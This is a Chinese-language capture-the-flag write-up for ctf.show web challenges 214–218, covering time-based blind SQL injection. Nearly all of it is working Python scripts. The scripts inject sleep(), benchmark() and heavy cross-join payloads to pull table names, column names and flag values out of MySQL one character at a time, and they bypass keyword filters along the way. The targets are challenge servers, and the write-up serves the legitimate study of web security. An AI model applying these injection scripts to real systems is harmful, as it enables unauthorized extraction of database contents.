ctfhow——web入门214~218（时间盲注开始）

web入门214

#@another:uwvwko
import requests

url='http://b0c11589-31c9-4bf9-8b66-6b5a1fc08726.challenge.ctf.show/api/index.php'
flag=''
str='{-_1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM}'

for i in range(1,50):
    for j in str:
         # 查数据库
        # payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
        # 查列名字-id.flag
        # payload = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagx'"
        # 查数据
        payload = "select flaga from ctfshow_flagx"
        
        data ={
            'ip':f"if(substr(({payload}),{i},1)='{j}',sleep(3),0)",
            'debug':'1'
        }
        
        r=requests.post(url,data=data)
        
        if r.elapsed.total_seconds() > 2:
            flag+=j
            print(flag)
            break

web入门215

#@uwvwko
import requests
import time

url='http://17ae312d-8d89-42f7-b881-b9068c90093b.challenge.ctf.show/api/'

flag=''

str='abcdefghijklmnopqrstuvwxyz0123456789{-}_QWERTYUIOPASDFGHJKLZXCVBNM'

for i in range(1,60):
    for j in str:
       
        payload={
            #'ip':f"1' or if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),'{i}',1)={q},sleep(3),'False')#",
            #'ip':f"1' or if(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxc'),'{i}',1)={q},sleep(3),'False')#",
            'ip': f"1' or if(substr((select group_concat(flagaa) from ctfshow_flagxc),{i},1)='{j}',sleep(3),'False')#",
            'debug': 0
               
        }
        
        r=requests.post(url,data=payload)
        if r.elapsed.total_seconds()>2:
            flag+=j
            print(flag)
            break

（为啥有个A类）

web入门216

base64编码，但是我们可以直接用）来闭合

如：where id =from_base64(0)payload

脚本：

import requests

url='http://c5791659-334c-48d2-833a-1f0c9fa90735.challenge.ctf.show/api/'
str='abcdefghijklmnopqrstuvwxyz0123456789{-}_QWERTYUIOPASDFGHJKLZXCVBNM'
flag = ''
 
for j in range(1, 50):
    for k in str:
        # payload = {'debug':'0','ip':f"1)or if(substr(database(),{j},1)='{k}',sleep(3),0)#"}  # 猜数据库名
        # payload = {'debug': '0', 'ip': f"1)or if(substr((select table_name from information_schema.tables where table_schema='ctfshow_web' limit 0, 1), {j}, 1) = '{k}',sleep(3),0)#"}  # 猜表名
        # payload = {'debug': '0','ip': f"1)or if(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web'), {j}, 1) = '{k}',sleep(3),0)#"}  # 猜表名
        # payload = {'debug': '0','ip': f"1)or if(substr((select group_concat(column_name) from information_schema.columns where table_schema='ctfshow_web' and table_name='ctfshow_flagxcc'), {j}, 1) = '{k}',sleep(3),0)#"}  # 猜列名
        payload = {
            'debug': '0', 
            'ip': f"1)or if(substr((select flagaac from ctfshow_flagxcc), {j}, 1) = '{k}',sleep(3),0)#"}  
 
        re = requests.post(url, data=payload)
        if re.elapsed.total_seconds() > 2:
            flag += k
            print(flag)
            break

web入门217

毙了sleep

看了下大佬的payload，我们可以使用 benchmark,

benchmark(count,expr)，重复执行 count 次 expr 表达式，使得处理时间很长

时间大概是3秒，然后开始写脚本

import requests

url='http://4baeb3f2-07a1-438f-a1a6-6e984cf82339.challenge.ctf.show/api/'
str='abcdefghijklmnopqrstuvwxyz0123456789{-}_QWERTYUIOPASDFGHJKLZXCVBNM'
flag = ''
 
for i in range(1, 60):
    for j in str:
        payload = {
            'debug': '1', 
            # 'ip':f"if(substr(database(),{j},1)='{k}',benchmark(3000000,md5('myon')),0)"}  # 猜数据库名
            # 'ip': f"if(substr((select table_name from information_schema.tables where table_schema='ctfshow_web' limit 0, 1), {j}, 1) = '{k}',benchmark(3000000,md5('12354')),0)"} 
            # 'ip': f"if(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web'), {j}, 1) = '{k}',benchmark(3000000,md5('12345')),0)"}  
            # 'ip': f"if(substr((select group_concat(column_name) from information_schema.columns where table_schema='ctfshow_web' and table_name='ctfshow_flagxccb'), {j}, 1) = '{k}',benchmark(3000000,md5('123415')),0)"} 
            'ip': f"if(substr((select flagaabc from ctfshow_flagxccb), {i}, 1) = '{j}',benchmark(3000000,md5('12345')),0)"
        }
        
        r = requests.post(url, data=payload)
        
        if r.elapsed.total_seconds() > 2:
            flag += j
            print(flag)
            break

web入门218

benchmark被禁了

脚本：

import requests

url = 'http://04ce659f-5b93-475f-8526-203b887d0719.challenge.ctf.show/api/'
str='abcdefghijklmnopqrstuvwxyz0123456789{-}_QWERTYUIOPASDFGHJKLZXCVBNM'
flag = ''

for i in range(0, 60):
    for j in str:
        payload = {
        'debug': '1', 
        #'ip': f"if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database(),{i},1)='{j}',(SELECT count(*) FROM information_schema.columns A, information_schema.columns B),'False')"
        #'ip': f"if(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxc'),{i},1)='{j}',(SELECT count(*) FROM information_schema.columns A, information_schema.columns B),'False')"
        'ip': f"if(substr((select group_concat(flagaac) from ctfshow_flagxc),{i},1)='{j}',(SELECT count(*) FROM information_schema.columns A, information_schema.columns B),'False')"
        }
        r = requests.post(url, data=payload)
        if r.elapsed.total_seconds() > 0.4:
            flag += j
            print(flag)
            break

(SELECT count(*) FROM information_schema.columns A, information_schema.columns B) 是一个时间延迟或资源消耗的操作，至于判断的时间要根据自己的电脑进行调试，显示出来的flag有可能会有误差